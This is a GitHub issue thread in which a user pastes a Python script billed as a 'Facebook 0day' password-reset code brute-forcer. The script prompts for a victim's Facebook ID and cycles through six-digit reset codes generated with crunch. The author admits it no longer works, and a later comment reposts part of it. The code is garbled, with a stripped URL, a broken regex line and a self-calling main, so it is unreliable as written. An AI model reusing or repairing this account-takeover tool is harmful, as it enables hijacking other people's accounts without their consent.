Chaudhary-Adeel / UrduSecurityFreeTools

These all Snippets are Provided By - Muhammad Adeel | Founder URduSecurity (c) 2014
GNU General Public License v2.0
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Hello this code does not work #1

Open muhommadalmusawi opened 6 years ago

muhommadalmusawi commented 6 years ago

Hello this code does not work

Chaudhary-Adeel commented 6 years ago

Which Code ? can you point it here?

muhommadalmusawi commented 6 years ago

I tried it on my account and put it in my password and did not extract it. Why

Chaudhary-Adeel commented 6 years ago

Which Tool You're Talking about?

muhommadalmusawi commented 6 years ago

This script .





!/usr/bin/env python

try: import urllib2, ssl, sys, time, re, os except ImportError: exit("[#] Please install Newer Version of Python!")

if "linux" in sys.platform: os.system('clear') else: os.system('cls')

def banner(): print """

| | | | | (_) | | | | | | | / \ / _| | | | | |_ | | | |_| | | | | / \/ __ | | | |/| | ' | | / \ |/ _` | _| | | / | ' | | \ /\ / | | | | || / | | | (| | | | _/\ () | | | | |
\/ \/|| |||___| |/_,|_| ___/\/|| ||_|

'Facebook 0day' Password reset Code bruteforcer

Author: Muhammad Adeel Mail: Blog:

[#] To Get Password list of all possible reset codes, Do it.

root@bt~$ crunch 6 6 1234567890 -o passlist.txt ----------------------------------------------------------------\n """

banner() victim_profile = raw_input("[#] Victim Facebook ID: ") password_list = raw_input("[#] Password List: ")

def ZerOday(): print "\n[!] Please sit down and have some snacks Untill exploit gets his job done!\n" try: passwd = open(password_list, 'r').readlines() except IOError: exit("[#] Unable to Find Password list.") for passw in passwd: passw = passw.rstrip() try: base_url = ''+victim_profile+'&n='+passw req = urllib2.urlopen(base_url).read() except: exit("[#] Unable to Send Request.") regex ='password_new', req) if regex: print "\n\n[#] The Reset code is Found => {0}".format(passw) exit() else: sys.stdout.write("Trying: " + passw + '\n') sys.stdout.flush()


def main(): if name == 'main': main()

Chaudhary-Adeel commented 6 years ago

Please Post the Error You Receive.

muhommadalmusawi commented 6 years ago

I did not take any mistake, but the script does not extract the password, which consists of six digits and the recovery code You can modify it to do the job you want Thank

Chaudhary-Adeel commented 6 years ago

Okay I checked it and you're right. I wrote this 4 years ago and facebook has changed its mechanism so this needs updates but i dnt have enough time, may be at some point i;ll update it.

muhommadalmusawi commented 6 years ago

Thank you Professor

Hanoasali commented 1 year ago

root@bt~$ crunch 6 6 1234567890 -o passlist.txt ----------------------------------------------------------------\n """

banner() victim_profile = raw_input("[#] Victim Facebook ID: ") password_list = raw_input("[#] Password List: ")

def ZerOday(): print "\n[!] Please sit down and have some snacks Untill exploit gets his job done!\n" try: passwd = open(password_list, 'r').readlines() except IOError: exit("[#] Unable to Find Password list.") for passw in passwd: passw = passw.rstrip() try: base_url = ' req = urllib2.urlopen(base_url).read() except: exit("[#] Unable to Send Request.") regex ='password_new', req) if regex: print "\n\n[#] The Reset code is Found => {0}".format(passw) exit() else: sys.stdout.write("Trying: " + passw + '\n') sys.stdout.flush()


def main(): if name == 'main': main()